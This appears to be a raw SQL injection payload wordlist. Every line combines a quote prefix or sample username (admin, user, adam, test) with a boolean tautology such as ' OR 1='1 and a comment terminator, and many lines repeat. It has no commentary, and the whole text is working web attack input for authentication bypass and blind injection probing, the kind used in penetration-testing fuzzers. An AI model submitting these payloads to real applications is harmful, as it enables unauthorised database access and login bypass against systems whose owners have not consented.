 AND 1=1 --
 AND 0=0 --
 AND 1=1 -- -;
 AND 0=0 -- -;
 AND 1=1 -- -
 AND 0=0 -- -
 AND 1=1 #
 AND 0=0 #
 AND 1=1 ;
 AND 0=0 ;
 AND 1=1 ;#
 AND 0=0 ;#
 AND 1=1 /*
 AND 0=0 /*
 AND 1=1 --
 AND 0=0 --
 AND 1=1 -- -;
 AND 0=0 -- -;
 AND 1=1 -- -
 AND 0=0 -- -
 AND 1=1 #
 AND 0=0 #
 AND 1=1 ;
 AND 0=0 ;
 AND 1=1 ;#
 AND 0=0 ;#
 AND 1=1 /*
 AND 0=0 /*
 AND 1=1 --
 AND 0=0 --
 AND 1=1 -- -;
 AND 0=0 -- -;
 AND 1=1 -- -
 AND 0=0 -- -
 AND 1=1 #
 AND 0=0 #
 AND 1=1 ;
 AND 0=0 ;
 AND 1=1 ;#
 AND 0=0 ;#
 AND 1=1 /*
 AND 0=0 /*
 AND 1=1 --
 AND 0=0 --
 AND 1=1 -- -;
 AND 0=0 -- -;
 AND 1=1 -- -
 AND 0=0 -- -
 AND 1=1 #
 AND 0=0 #
 AND 1=1 ;
 AND 0=0 ;
 AND 1=1 ;#
 AND 0=0 ;#
 AND 1=1 /*
 AND 0=0 /*
' AND 1=1 --
' AND 0=0 --
' AND 1=1 -- -;
' AND 0=0 -- -;
' AND 1=1 -- -
' AND 0=0 -- -
' AND 1=1 #
' AND 0=0 #
' AND 1=1 ;
' AND 0=0 ;
' AND 1=1 ;#
' AND 0=0 ;#
' AND 1=1 /*
' AND 0=0 /*
' AND 1=1 --
' AND 0=0 --
' AND 1=1 -- -;
' AND 0=0 -- -;
' AND 1=1 -- -
' AND 0=0 -- -
' AND 1=1 #
' AND 0=0 #
' AND 1=1 ;
' AND 0=0 ;
' AND 1=1 ;#
' AND 0=0 ;#
' AND 1=1 /*
' AND 0=0 /*
' AND 1=1 --
' AND 0=0 --
' AND 1=1 -- -;
' AND 0=0 -- -;
' AND 1=1 -- -
' AND 0=0 -- -
' AND 1=1 #
' AND 0=0 #
' AND 1=1 ;
' AND 0=0 ;
' AND 1=1 ;#
' AND 0=0 ;#
' AND 1=1 /*
' AND 0=0 /*
' AND 1=1 --
' AND 0=0 --
' AND 1=1 -- -;
' AND 0=0 -- -;
' AND 1=1 -- -
' AND 0=0 -- -
' AND 1=1 #
' AND 0=0 #
' AND 1=1 ;
' AND 0=0 ;
' AND 1=1 ;#
' AND 0=0 ;#
' AND 1=1 /*
' AND 0=0 /*
" AND 1=1 --
" AND 0=0 --
" AND 1=1 -- -;
" AND 0=0 -- -;
" AND 1=1 -- -
" AND 0=0 -- -
" AND 1=1 #
" AND 0=0 #
" AND 1=1 ;
" AND 0=0 ;
" AND 1=1 ;#
" AND 0=0 ;#
" AND 1=1 /*
" AND 0=0 /*
" AND 1=1 --
" AND 0=0 --
" AND 1=1 -- -;
" AND 0=0 -- -;
" AND 1=1 -- -
" AND 0=0 -- -
" AND 1=1 #
" AND 0=0 #
" AND 1=1 ;
" AND 0=0 ;
" AND 1=1 ;#
" AND 0=0 ;#
" AND 1=1 /*
" AND 0=0 /*
" AND 1=1 --
" AND 0=0 --
" AND 1=1 -- -;
" AND 0=0 -- -;
" AND 1=1 -- -
" AND 0=0 -- -
" AND 1=1 #
" AND 0=0 #
" AND 1=1 ;
" AND 0=0 ;
" AND 1=1 ;#
" AND 0=0 ;#
" AND 1=1 /*
" AND 0=0 /*
" AND 1=1 --
" AND 0=0 --
" AND 1=1 -- -;
" AND 0=0 -- -;
" AND 1=1 -- -
" AND 0=0 -- -
" AND 1=1 #
" AND 0=0 #
" AND 1=1 ;
" AND 0=0 ;
" AND 1=1 ;#
" AND 0=0 ;#
" AND 1=1 /*
" AND 0=0 /*
user" AND 1=1 --
user" AND 0=0 --
user" AND 1=1 -- -;
user" AND 0=0 -- -;
user" AND 1=1 -- -
user" AND 0=0 -- -
user" AND 1=1 #
user" AND 0=0 #
user" AND 1=1 ;
user" AND 0=0 ;
user" AND 1=1 ;#
user" AND 0=0 ;#
user" AND 1=1 /*
user" AND 0=0 /*
admin" AND 1=1 --
admin" AND 0=0 --
admin" AND 1=1 -- -;
admin" AND 0=0 -- -;
admin" AND 1=1 -- -
admin" AND 0=0 -- -
admin" AND 1=1 #
admin" AND 0=0 #
admin" AND 1=1 ;
admin" AND 0=0 ;
admin" AND 1=1 ;#
admin" AND 0=0 ;#
admin" AND 1=1 /*
admin" AND 0=0 /*
adam" AND 1=1 --
adam" AND 0=0 --
adam" AND 1=1 -- -;
adam" AND 0=0 -- -;
adam" AND 1=1 -- -
adam" AND 0=0 -- -
adam" AND 1=1 #
adam" AND 0=0 #
adam" AND 1=1 ;
adam" AND 0=0 ;
adam" AND 1=1 ;#
adam" AND 0=0 ;#
adam" AND 1=1 /*
adam" AND 0=0 /*
test" AND 1=1 --
test" AND 0=0 --
test" AND 1=1 -- -;
test" AND 0=0 -- -;
test" AND 1=1 -- -
test" AND 0=0 -- -
test" AND 1=1 #
test" AND 0=0 #
test" AND 1=1 ;
test" AND 0=0 ;
test" AND 1=1 ;#
test" AND 0=0 ;#
test" AND 1=1 /*
test" AND 0=0 /*
user' AND 1=1 --
user' AND 0=0 --
user' AND 1=1 -- -;
user' AND 0=0 -- -;
user' AND 1=1 -- -
user' AND 0=0 -- -
user' AND 1=1 #
user' AND 0=0 #
user' AND 1=1 ;
user' AND 0=0 ;
user' AND 1=1 ;#
user' AND 0=0 ;#
user' AND 1=1 /*
user' AND 0=0 /*
admin' AND 1=1 --
admin' AND 0=0 --
admin' AND 1=1 -- -;
admin' AND 0=0 -- -;
admin' AND 1=1 -- -
admin' AND 0=0 -- -
admin' AND 1=1 #
admin' AND 0=0 #
admin' AND 1=1 ;
admin' AND 0=0 ;
admin' AND 1=1 ;#
admin' AND 0=0 ;#
admin' AND 1=1 /*
admin' AND 0=0 /*
adam' AND 1=1 --
adam' AND 0=0 --
adam' AND 1=1 -- -;
adam' AND 0=0 -- -;
adam' AND 1=1 -- -
adam' AND 0=0 -- -
adam' AND 1=1 #
adam' AND 0=0 #
adam' AND 1=1 ;
adam' AND 0=0 ;
adam' AND 1=1 ;#
adam' AND 0=0 ;#
adam' AND 1=1 /*
adam' AND 0=0 /*
test' AND 1=1 --
test' AND 0=0 --
test' AND 1=1 -- -;
test' AND 0=0 -- -;
test' AND 1=1 -- -
test' AND 0=0 -- -
test' AND 1=1 #
test' AND 0=0 #
test' AND 1=1 ;
test' AND 0=0 ;
test' AND 1=1 ;#
test' AND 0=0 ;#
test' AND 1=1 /*
test' AND 0=0 /*
user AND 1=1 --
user AND 0=0 --
user AND 1=1 -- -;
user AND 0=0 -- -;
user AND 1=1 -- -
user AND 0=0 -- -
user AND 1=1 #
user AND 0=0 #
user AND 1=1 ;
user AND 0=0 ;
user AND 1=1 ;#
user AND 0=0 ;#
user AND 1=1 /*
user AND 0=0 /*
admin AND 1=1 --
admin AND 0=0 --
admin AND 1=1 -- -;
admin AND 0=0 -- -;
admin AND 1=1 -- -
admin AND 0=0 -- -
admin AND 1=1 #
admin AND 0=0 #
admin AND 1=1 ;
admin AND 0=0 ;
admin AND 1=1 ;#
admin AND 0=0 ;#
admin AND 1=1 /*
admin AND 0=0 /*
adam AND 1=1 --
adam AND 0=0 --
adam AND 1=1 -- -;
adam AND 0=0 -- -;
adam AND 1=1 -- -
adam AND 0=0 -- -
adam AND 1=1 #
adam AND 0=0 #
adam AND 1=1 ;
adam AND 0=0 ;
adam AND 1=1 ;#
adam AND 0=0 ;#
adam AND 1=1 /*
adam AND 0=0 /*
test AND 1=1 --
test AND 0=0 --
test AND 1=1 -- -;
test AND 0=0 -- -;
test AND 1=1 -- -
test AND 0=0 -- -
test AND 1=1 #
test AND 0=0 #
test AND 1=1 ;
test AND 0=0 ;
test AND 1=1 ;#
test AND 0=0 ;#
test AND 1=1 /*
test AND 0=0 /*
 AND 1='1 --
 AND 0='0 --
 AND 1='1 -- -;
 AND 0='0 -- -;
 AND 1='1 -- -
 AND 0='0 -- -
 AND 1='1 #
 AND 0='0 #
 AND 1='1 ;
 AND 0='0 ;
 AND 1='1 ;#
 AND 0='0 ;#
 AND 1='1 /*
 AND 0='0 /*
 AND 1='1 --
 AND 0='0 --
 AND 1='1 -- -;
 AND 0='0 -- -;
 AND 1='1 -- -
 AND 0='0 -- -
 AND 1='1 #
 AND 0='0 #
 AND 1='1 ;
 AND 0='0 ;
 AND 1='1 ;#
 AND 0='0 ;#
 AND 1='1 /*
 AND 0='0 /*
 AND 1='1 --
 AND 0='0 --
 AND 1='1 -- -;
 AND 0='0 -- -;
 AND 1='1 -- -
 AND 0='0 -- -
 AND 1='1 #
 AND 0='0 #
 AND 1='1 ;
 AND 0='0 ;
 AND 1='1 ;#
 AND 0='0 ;#
 AND 1='1 /*
 AND 0='0 /*
 AND 1='1 --
 AND 0='0 --
 AND 1='1 -- -;
 AND 0='0 -- -;
 AND 1='1 -- -
 AND 0='0 -- -
 AND 1='1 #
 AND 0='0 #
 AND 1='1 ;
 AND 0='0 ;
 AND 1='1 ;#
 AND 0='0 ;#
 AND 1='1 /*
 AND 0='0 /*
' AND 1='1 --
' AND 0='0 --
' AND 1='1 -- -;
' AND 0='0 -- -;
' AND 1='1 -- -
' AND 0='0 -- -
' AND 1='1 #
' AND 0='0 #
' AND 1='1 ;
' AND 0='0 ;
' AND 1='1 ;#
' AND 0='0 ;#
' AND 1='1 /*
' AND 0='0 /*
' AND 1='1 --
' AND 0='0 --
' AND 1='1 -- -;
' AND 0='0 -- -;
' AND 1='1 -- -
' AND 0='0 -- -
' AND 1='1 #
' AND 0='0 #
' AND 1='1 ;
' AND 0='0 ;
' AND 1='1 ;#
' AND 0='0 ;#
' AND 1='1 /*
' AND 0='0 /*
' AND 1='1 --
' AND 0='0 --
' AND 1='1 -- -;
' AND 0='0 -- -;
' AND 1='1 -- -
' AND 0='0 -- -
' AND 1='1 #
' AND 0='0 #
' AND 1='1 ;
' AND 0='0 ;
' AND 1='1 ;#
' AND 0='0 ;#
' AND 1='1 /*
' AND 0='0 /*
' AND 1='1 --
' AND 0='0 --
' AND 1='1 -- -;
' AND 0='0 -- -;
' AND 1='1 -- -
' AND 0='0 -- -
' AND 1='1 #
' AND 0='0 #
' AND 1='1 ;
' AND 0='0 ;
' AND 1='1 ;#
' AND 0='0 ;#
' AND 1='1 /*
' AND 0='0 /*
" AND 1='1 --
" AND 0='0 --
" AND 1='1 -- -;
" AND 0='0 -- -;
" AND 1='1 -- -
" AND 0='0 -- -
" AND 1='1 #
" AND 0='0 #
" AND 1='1 ;
" AND 0='0 ;
" AND 1='1 ;#
" AND 0='0 ;#
" AND 1='1 /*
" AND 0='0 /*
" AND 1='1 --
" AND 0='0 --
" AND 1='1 -- -;
" AND 0='0 -- -;
" AND 1='1 -- -
" AND 0='0 -- -
" AND 1='1 #
" AND 0='0 #
" AND 1='1 ;
" AND 0='0 ;
" AND 1='1 ;#
" AND 0='0 ;#
" AND 1='1 /*
" AND 0='0 /*
" AND 1='1 --
" AND 0='0 --
" AND 1='1 -- -;
" AND 0='0 -- -;
" AND 1='1 -- -
" AND 0='0 -- -
" AND 1='1 #
" AND 0='0 #
" AND 1='1 ;
" AND 0='0 ;
" AND 1='1 ;#
" AND 0='0 ;#
" AND 1='1 /*
" AND 0='0 /*
" AND 1='1 --
" AND 0='0 --
" AND 1='1 -- -;
" AND 0='0 -- -;
" AND 1='1 -- -
" AND 0='0 -- -
" AND 1='1 #
" AND 0='0 #
" AND 1='1 ;
" AND 0='0 ;
" AND 1='1 ;#
" AND 0='0 ;#
" AND 1='1 /*
" AND 0='0 /*
user" AND 1='1 --
user" AND 0='0 --
user" AND 1='1 -- -;
user" AND 0='0 -- -;
user" AND 1='1 -- -
user" AND 0='0 -- -
user" AND 1='1 #
user" AND 0='0 #
user" AND 1='1 ;
user" AND 0='0 ;
user" AND 1='1 ;#
user" AND 0='0 ;#
user" AND 1='1 /*
user" AND 0='0 /*
admin" AND 1='1 --
admin" AND 0='0 --
admin" AND 1='1 -- -;
admin" AND 0='0 -- -;
admin" AND 1='1 -- -
admin" AND 0='0 -- -
admin" AND 1='1 #
admin" AND 0='0 #
admin" AND 1='1 ;
admin" AND 0='0 ;
admin" AND 1='1 ;#
admin" AND 0='0 ;#
admin" AND 1='1 /*
admin" AND 0='0 /*
adam" AND 1='1 --
adam" AND 0='0 --
adam" AND 1='1 -- -;
adam" AND 0='0 -- -;
adam" AND 1='1 -- -
adam" AND 0='0 -- -
adam" AND 1='1 #
adam" AND 0='0 #
adam" AND 1='1 ;
adam" AND 0='0 ;
adam" AND 1='1 ;#
adam" AND 0='0 ;#
adam" AND 1='1 /*
adam" AND 0='0 /*
test" AND 1='1 --
test" AND 0='0 --
test" AND 1='1 -- -;
test" AND 0='0 -- -;
test" AND 1='1 -- -
test" AND 0='0 -- -
test" AND 1='1 #
test" AND 0='0 #
test" AND 1='1 ;
test" AND 0='0 ;
test" AND 1='1 ;#
test" AND 0='0 ;#
test" AND 1='1 /*
test" AND 0='0 /*
user' AND 1='1 --
user' AND 0='0 --
user' AND 1='1 -- -;
user' AND 0='0 -- -;
user' AND 1='1 -- -
user' AND 0='0 -- -
user' AND 1='1 #
user' AND 0='0 #
user' AND 1='1 ;
user' AND 0='0 ;
user' AND 1='1 ;#
user' AND 0='0 ;#
user' AND 1='1 /*
user' AND 0='0 /*
admin' AND 1='1 --
admin' AND 0='0 --
admin' AND 1='1 -- -;
admin' AND 0='0 -- -;
admin' AND 1='1 -- -
admin' AND 0='0 -- -
admin' AND 1='1 #
admin' AND 0='0 #
admin' AND 1='1 ;
admin' AND 0='0 ;
admin' AND 1='1 ;#
admin' AND 0='0 ;#
admin' AND 1='1 /*
admin' AND 0='0 /*
adam' AND 1='1 --
adam' AND 0='0 --
adam' AND 1='1 -- -;
adam' AND 0='0 -- -;
adam' AND 1='1 -- -
adam' AND 0='0 -- -
adam' AND 1='1 #
adam' AND 0='0 #
adam' AND 1='1 ;
adam' AND 0='0 ;
adam' AND 1='1 ;#
adam' AND 0='0 ;#
adam' AND 1='1 /*
adam' AND 0='0 /*
test' AND 1='1 --
test' AND 0='0 --
test' AND 1='1 -- -;
test' AND 0='0 -- -;
test' AND 1='1 -- -
test' AND 0='0 -- -
test' AND 1='1 #
test' AND 0='0 #
test' AND 1='1 ;
test' AND 0='0 ;
test' AND 1='1 ;#
test' AND 0='0 ;#
test' AND 1='1 /*
test' AND 0='0 /*
user AND 1='1 --
user AND 0='0 --
user AND 1='1 -- -;
user AND 0='0 -- -;
user AND 1='1 -- -
user AND 0='0 -- -
user AND 1='1 #
user AND 0='0 #
user AND 1='1 ;
user AND 0='0 ;
user AND 1='1 ;#
user AND 0='0 ;#
user AND 1='1 /*
user AND 0='0 /*
admin AND 1='1 --
admin AND 0='0 --
admin AND 1='1 -- -;
admin AND 0='0 -- -;
admin AND 1='1 -- -
admin AND 0='0 -- -
admin AND 1='1 #
admin AND 0='0 #
admin AND 1='1 ;
admin AND 0='0 ;
admin AND 1='1 ;#
admin AND 0='0 ;#
admin AND 1='1 /*
admin AND 0='0 /*
adam AND 1='1 --
adam AND 0='0 --
adam AND 1='1 -- -;
adam AND 0='0 -- -;
adam AND 1='1 -- -
adam AND 0='0 -- -
adam AND 1='1 #
adam AND 0='0 #
adam AND 1='1 ;
adam AND 0='0 ;
adam AND 1='1 ;#
adam AND 0='0 ;#
adam AND 1='1 /*
adam AND 0='0 /*
test AND 1='1 --
test AND 0='0 --
test AND 1='1 -- -;
test AND 0='0 -- -;
test AND 1='1 -- -
test AND 0='0 -- -
test AND 1='1 #
test AND 0='0 #
test AND 1='1 ;
test AND 0='0 ;
test AND 1='1 ;#
test AND 0='0 ;#
test AND 1='1 /*
test AND 0='0 /*
 AND 1="1 --
 AND 0="0 --
 AND 1="1 -- -;
 AND 0="0 -- -;
 AND 1="1 -- -
 AND 0="0 -- -
 AND 1="1 #
 AND 0="0 #
 AND 1="1 ;
 AND 0="0 ;
 AND 1="1 ;#
 AND 0="0 ;#
 AND 1="1 /*
 AND 0="0 /*
 AND 1="1 --
 AND 0="0 --
 AND 1="1 -- -;
 AND 0="0 -- -;
 AND 1="1 -- -
 AND 0="0 -- -
 AND 1="1 #
 AND 0="0 #
 AND 1="1 ;
 AND 0="0 ;
 AND 1="1 ;#
 AND 0="0 ;#
 AND 1="1 /*
 AND 0="0 /*
 AND 1="1 --
 AND 0="0 --
 AND 1="1 -- -;
 AND 0="0 -- -;
 AND 1="1 -- -
 AND 0="0 -- -
 AND 1="1 #
 AND 0="0 #
 AND 1="1 ;
 AND 0="0 ;
 AND 1="1 ;#
 AND 0="0 ;#
 AND 1="1 /*
 AND 0="0 /*
 AND 1="1 --
 AND 0="0 --
 AND 1="1 -- -;
 AND 0="0 -- -;
 AND 1="1 -- -
 AND 0="0 -- -
 AND 1="1 #
 AND 0="0 #
 AND 1="1 ;
 AND 0="0 ;
 AND 1="1 ;#
 AND 0="0 ;#
 AND 1="1 /*
 AND 0="0 /*
' AND 1="1 --
' AND 0="0 --
' AND 1="1 -- -;
' AND 0="0 -- -;
' AND 1="1 -- -
' AND 0="0 -- -
' AND 1="1 #
' AND 0="0 #
' AND 1="1 ;
' AND 0="0 ;
' AND 1="1 ;#
' AND 0="0 ;#
' AND 1="1 /*
' AND 0="0 /*
' AND 1="1 --
' AND 0="0 --
' AND 1="1 -- -;
' AND 0="0 -- -;
' AND 1="1 -- -
' AND 0="0 -- -
' AND 1="1 #
' AND 0="0 #
' AND 1="1 ;
' AND 0="0 ;
' AND 1="1 ;#
' AND 0="0 ;#
' AND 1="1 /*
' AND 0="0 /*
' AND 1="1 --
' AND 0="0 --
' AND 1="1 -- -;
' AND 0="0 -- -;
' AND 1="1 -- -
' AND 0="0 -- -
' AND 1="1 #
' AND 0="0 #
' AND 1="1 ;
' AND 0="0 ;
' AND 1="1 ;#
' AND 0="0 ;#
' AND 1="1 /*
' AND 0="0 /*
' AND 1="1 --
' AND 0="0 --
' AND 1="1 -- -;
' AND 0="0 -- -;
' AND 1="1 -- -
' AND 0="0 -- -
' AND 1="1 #
' AND 0="0 #
' AND 1="1 ;
' AND 0="0 ;
' AND 1="1 ;#
' AND 0="0 ;#
' AND 1="1 /*
' AND 0="0 /*
" AND 1="1 --
" AND 0="0 --
" AND 1="1 -- -;
" AND 0="0 -- -;
" AND 1="1 -- -
" AND 0="0 -- -
" AND 1="1 #
" AND 0="0 #
" AND 1="1 ;
" AND 0="0 ;
" AND 1="1 ;#
" AND 0="0 ;#
" AND 1="1 /*
" AND 0="0 /*
" AND 1="1 --
" AND 0="0 --
" AND 1="1 -- -;
" AND 0="0 -- -;
" AND 1="1 -- -
" AND 0="0 -- -
" AND 1="1 #
" AND 0="0 #
" AND 1="1 ;
" AND 0="0 ;
" AND 1="1 ;#
" AND 0="0 ;#
" AND 1="1 /*
" AND 0="0 /*
" AND 1="1 --
" AND 0="0 --
" AND 1="1 -- -;
" AND 0="0 -- -;
" AND 1="1 -- -
" AND 0="0 -- -
" AND 1="1 #
" AND 0="0 #
" AND 1="1 ;
" AND 0="0 ;
" AND 1="1 ;#
" AND 0="0 ;#
" AND 1="1 /*
" AND 0="0 /*
" AND 1="1 --
" AND 0="0 --
" AND 1="1 -- -;
" AND 0="0 -- -;
" AND 1="1 -- -
" AND 0="0 -- -
" AND 1="1 #
" AND 0="0 #
" AND 1="1 ;
" AND 0="0 ;
" AND 1="1 ;#
" AND 0="0 ;#
" AND 1="1 /*
" AND 0="0 /*
user" AND 1="1 --
user" AND 0="0 --
user" AND 1="1 -- -;
user" AND 0="0 -- -;
user" AND 1="1 -- -
user" AND 0="0 -- -
user" AND 1="1 #
user" AND 0="0 #
user" AND 1="1 ;
user" AND 0="0 ;
user" AND 1="1 ;#
user" AND 0="0 ;#
user" AND 1="1 /*
user" AND 0="0 /*
admin" AND 1="1 --
admin" AND 0="0 --
admin" AND 1="1 -- -;
admin" AND 0="0 -- -;
admin" AND 1="1 -- -
admin" AND 0="0 -- -
admin" AND 1="1 #
admin" AND 0="0 #
admin" AND 1="1 ;
admin" AND 0="0 ;
admin" AND 1="1 ;#
admin" AND 0="0 ;#
admin" AND 1="1 /*
admin" AND 0="0 /*
adam" AND 1="1 --
adam" AND 0="0 --
adam" AND 1="1 -- -;
adam" AND 0="0 -- -;
adam" AND 1="1 -- -
adam" AND 0="0 -- -
adam" AND 1="1 #
adam" AND 0="0 #
adam" AND 1="1 ;
adam" AND 0="0 ;
adam" AND 1="1 ;#
adam" AND 0="0 ;#
adam" AND 1="1 /*
adam" AND 0="0 /*
test" AND 1="1 --
test" AND 0="0 --
test" AND 1="1 -- -;
test" AND 0="0 -- -;
test" AND 1="1 -- -
test" AND 0="0 -- -
test" AND 1="1 #
test" AND 0="0 #
test" AND 1="1 ;
test" AND 0="0 ;
test" AND 1="1 ;#
test" AND 0="0 ;#
test" AND 1="1 /*
test" AND 0="0 /*
user' AND 1="1 --
user' AND 0="0 --
user' AND 1="1 -- -;
user' AND 0="0 -- -;
user' AND 1="1 -- -
user' AND 0="0 -- -
user' AND 1="1 #
user' AND 0="0 #
user' AND 1="1 ;
user' AND 0="0 ;
user' AND 1="1 ;#
user' AND 0="0 ;#
user' AND 1="1 /*
user' AND 0="0 /*
admin' AND 1="1 --
admin' AND 0="0 --
admin' AND 1="1 -- -;
admin' AND 0="0 -- -;
admin' AND 1="1 -- -
admin' AND 0="0 -- -
admin' AND 1="1 #
admin' AND 0="0 #
admin' AND 1="1 ;
admin' AND 0="0 ;
admin' AND 1="1 ;#
admin' AND 0="0 ;#
admin' AND 1="1 /*
admin' AND 0="0 /*
adam' AND 1="1 --
adam' AND 0="0 --
adam' AND 1="1 -- -;
adam' AND 0="0 -- -;
adam' AND 1="1 -- -
adam' AND 0="0 -- -
adam' AND 1="1 #
adam' AND 0="0 #
adam' AND 1="1 ;
adam' AND 0="0 ;
adam' AND 1="1 ;#
adam' AND 0="0 ;#
adam' AND 1="1 /*
adam' AND 0="0 /*
test' AND 1="1 --
test' AND 0="0 --
test' AND 1="1 -- -;
test' AND 0="0 -- -;
test' AND 1="1 -- -
test' AND 0="0 -- -
test' AND 1="1 #
test' AND 0="0 #
test' AND 1="1 ;
test' AND 0="0 ;
test' AND 1="1 ;#
test' AND 0="0 ;#
test' AND 1="1 /*
test' AND 0="0 /*
user AND 1="1 --
user AND 0="0 --
user AND 1="1 -- -;
user AND 0="0 -- -;
user AND 1="1 -- -
user AND 0="0 -- -
user AND 1="1 #
user AND 0="0 #
user AND 1="1 ;
user AND 0="0 ;
user AND 1="1 ;#
user AND 0="0 ;#
user AND 1="1 /*
user AND 0="0 /*
admin AND 1="1 --
admin AND 0="0 --
admin AND 1="1 -- -;
admin AND 0="0 -- -;
admin AND 1="1 -- -
admin AND 0="0 -- -
admin AND 1="1 #
admin AND 0="0 #
admin AND 1="1 ;
admin AND 0="0 ;
admin AND 1="1 ;#
admin AND 0="0 ;#
admin AND 1="1 /*
admin AND 0="0 /*
adam AND 1="1 --
adam AND 0="0 --
adam AND 1="1 -- -;
adam AND 0="0 -- -;
adam AND 1="1 -- -
adam AND 0="0 -- -
adam AND 1="1 #
adam AND 0="0 #
adam AND 1="1 ;
adam AND 0="0 ;
adam AND 1="1 ;#
adam AND 0="0 ;#
adam AND 1="1 /*
adam AND 0="0 /*
test AND 1="1 --
test AND 0="0 --
test AND 1="1 -- -;
test AND 0="0 -- -;
test AND 1="1 -- -
test AND 0="0 -- -
test AND 1="1 #
test AND 0="0 #
test AND 1="1 ;
test AND 0="0 ;
test AND 1="1 ;#
test AND 0="0 ;#
test AND 1="1 /*
test AND 0="0 /*
 OR 1='1 --
 OR 0='0 --
 OR 1='1 -- -;
 OR 0='0 -- -;
 OR 1='1 -- -
 OR 0='0 -- -
 OR 1='1 #
 OR 0='0 #
 OR 1='1 ;
 OR 0='0 ;
 OR 1='1 ;#
 OR 0='0 ;#
 OR 1='1 /*
 OR 0='0 /*
 OR 1='1 --
 OR 0='0 --
 OR 1='1 -- -;
 OR 0='0 -- -;
 OR 1='1 -- -
 OR 0='0 -- -
 OR 1='1 #
 OR 0='0 #
 OR 1='1 ;
 OR 0='0 ;
 OR 1='1 ;#
 OR 0='0 ;#
 OR 1='1 /*
 OR 0='0 /*
 OR 1='1 --
 OR 0='0 --
 OR 1='1 -- -;
 OR 0='0 -- -;
 OR 1='1 -- -
 OR 0='0 -- -
 OR 1='1 #
 OR 0='0 #
 OR 1='1 ;
 OR 0='0 ;
 OR 1='1 ;#
 OR 0='0 ;#
 OR 1='1 /*
 OR 0='0 /*
 OR 1='1 --
 OR 0='0 --
 OR 1='1 -- -;
 OR 0='0 -- -;
 OR 1='1 -- -
 OR 0='0 -- -
 OR 1='1 #
 OR 0='0 #
 OR 1='1 ;
 OR 0='0 ;
 OR 1='1 ;#
 OR 0='0 ;#
 OR 1='1 /*
 OR 0='0 /*
' OR 1='1 --
' OR 0='0 --
' OR 1='1 -- -;
' OR 0='0 -- -;
' OR 1='1 -- -
' OR 0='0 -- -
' OR 1='1 #
' OR 0='0 #
' OR 1='1 ;
' OR 0='0 ;
' OR 1='1 ;#
' OR 0='0 ;#
' OR 1='1 /*
' OR 0='0 /*
' OR 1='1 --
' OR 0='0 --
' OR 1='1 -- -;
' OR 0='0 -- -;
' OR 1='1 -- -
' OR 0='0 -- -
' OR 1='1 #
' OR 0='0 #
' OR 1='1 ;
' OR 0='0 ;
' OR 1='1 ;#
' OR 0='0 ;#
' OR 1='1 /*
' OR 0='0 /*
' OR 1='1 --
' OR 0='0 --
' OR 1='1 -- -;
' OR 0='0 -- -;
' OR 1='1 -- -
' OR 0='0 -- -
' OR 1='1 #
' OR 0='0 #
' OR 1='1 ;
' OR 0='0 ;
' OR 1='1 ;#
' OR 0='0 ;#
' OR 1='1 /*
' OR 0='0 /*
' OR 1='1 --
' OR 0='0 --
' OR 1='1 -- -;
' OR 0='0 -- -;
' OR 1='1 -- -
' OR 0='0 -- -
' OR 1='1 #
' OR 0='0 #
' OR 1='1 ;
' OR 0='0 ;
' OR 1='1 ;#
' OR 0='0 ;#
' OR 1='1 /*
' OR 0='0 /*
" OR 1='1 --
" OR 0='0 --
" OR 1='1 -- -;
" OR 0='0 -- -;
" OR 1='1 -- -
" OR 0='0 -- -
" OR 1='1 #
" OR 0='0 #
" OR 1='1 ;
" OR 0='0 ;
" OR 1='1 ;#
" OR 0='0 ;#
" OR 1='1 /*
" OR 0='0 /*
" OR 1='1 --
" OR 0='0 --
" OR 1='1 -- -;
" OR 0='0 -- -;
" OR 1='1 -- -
" OR 0='0 -- -
" OR 1='1 #
" OR 0='0 #
" OR 1='1 ;
" OR 0='0 ;
" OR 1='1 ;#
" OR 0='0 ;#
" OR 1='1 /*
" OR 0='0 /*
" OR 1='1 --
" OR 0='0 --
" OR 1='1 -- -;
" OR 0='0 -- -;
" OR 1='1 -- -
" OR 0='0 -- -
" OR 1='1 #
" OR 0='0 #
" OR 1='1 ;
" OR 0='0 ;
" OR 1='1 ;#
" OR 0='0 ;#
" OR 1='1 /*
" OR 0='0 /*
" OR 1='1 --
" OR 0='0 --
" OR 1='1 -- -;
" OR 0='0 -- -;
" OR 1='1 -- -
" OR 0='0 -- -
" OR 1='1 #
" OR 0='0 #
" OR 1='1 ;
" OR 0='0 ;
" OR 1='1 ;#
" OR 0='0 ;#
" OR 1='1 /*
" OR 0='0 /*
user" OR 1='1 --
user" OR 0='0 --
user" OR 1='1 -- -;
user" OR 0='0 -- -;
user" OR 1='1 -- -
user" OR 0='0 -- -
user" OR 1='1 #
user" OR 0='0 #
user" OR 1='1 ;
user" OR 0='0 ;
user" OR 1='1 ;#
user" OR 0='0 ;#
user" OR 1='1 /*
user" OR 0='0 /*
admin" OR 1='1 --
admin" OR 0='0 --
admin" OR 1='1 -- -;
admin" OR 0='0 -- -;
admin" OR 1='1 -- -
admin" OR 0='0 -- -
admin" OR 1='1 #
admin" OR 0='0 #
admin" OR 1='1 ;
admin" OR 0='0 ;
admin" OR 1='1 ;#
admin" OR 0='0 ;#
admin" OR 1='1 /*
admin" OR 0='0 /*
adam" OR 1='1 --
adam" OR 0='0 --
adam" OR 1='1 -- -;
adam" OR 0='0 -- -;
adam" OR 1='1 -- -
adam" OR 0='0 -- -
adam" OR 1='1 #
adam" OR 0='0 #
adam" OR 1='1 ;
adam" OR 0='0 ;
adam" OR 1='1 ;#
adam" OR 0='0 ;#
adam" OR 1='1 /*
adam" OR 0='0 /*
test" OR 1='1 --
test" OR 0='0 --
test" OR 1='1 -- -;
test" OR 0='0 -- -;
test" OR 1='1 -- -
test" OR 0='0 -- -
test" OR 1='1 #
test" OR 0='0 #
test" OR 1='1 ;
test" OR 0='0 ;
test" OR 1='1 ;#
test" OR 0='0 ;#
test" OR 1='1 /*
test" OR 0='0 /*
user' OR 1='1 --
user' OR 0='0 --
user' OR 1='1 -- -;
user' OR 0='0 -- -;
user' OR 1='1 -- -
user' OR 0='0 -- -
user' OR 1='1 #
user' OR 0='0 #
user' OR 1='1 ;
user' OR 0='0 ;
user' OR 1='1 ;#
user' OR 0='0 ;#
user' OR 1='1 /*
user' OR 0='0 /*
admin' OR 1='1 --
admin' OR 0='0 --
admin' OR 1='1 -- -;
admin' OR 0='0 -- -;
admin' OR 1='1 -- -
admin' OR 0='0 -- -
admin' OR 1='1 #
admin' OR 0='0 #
admin' OR 1='1 ;
admin' OR 0='0 ;
admin' OR 1='1 ;#
admin' OR 0='0 ;#
admin' OR 1='1 /*
admin' OR 0='0 /*
adam' OR 1='1 --
adam' OR 0='0 --
adam' OR 1='1 -- -;
adam' OR 0='0 -- -;
